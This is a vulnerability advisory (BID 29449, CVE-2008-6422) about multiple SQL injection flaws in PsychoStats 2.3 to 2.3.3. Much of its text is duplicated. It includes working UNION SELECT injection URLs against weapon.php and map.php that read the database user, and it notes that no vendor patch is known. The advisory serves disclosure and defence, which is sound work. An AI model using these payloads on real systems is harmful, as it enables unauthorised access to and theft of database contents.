PsychoStats Multiple SQL Injection Vulnerabilities
BID:29449
Info
PsychoStats Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 29449 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6422 |
| Remote: | Yes |
| Local: | No |
| Published: | May 31 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | Mr.SQL -(:: ThE Geek InjEcT0r ::)- |
| Vulnerable: |
PsychoStats PsychoStats 2.3.3 PsychoStats PsychoStats 2.3.1 PsychoStats PsychoStats 2.3 |
| Not Vulnerable: | |
Discussion
PsychoStats Multiple SQL Injection Vulnerabilities
PsychoStats is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PsychoStats is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PsychoStats Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following examples are available:
(Version 2.3)
http://www.example.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
(Version 2.3.1)
http://www.example.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
(Version 2.3.3)
http://www.example.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Attackers can use a browser to exploit these issues.
The following examples are available:
(Version 2.3)
http://www.example.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
(Version 2.3.1)
http://www.example.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
(Version 2.3.3)
http://www.example.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Solution / Fix
PsychoStats Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PsychoStats Multiple SQL Injection Vulnerabilities
References:
References:
- PsychoStats Home Page (PsychoStats)
- PsychoStats <= 2.3.3 Multiple Remote SQL Injection Vulnerabilities (milw0rm)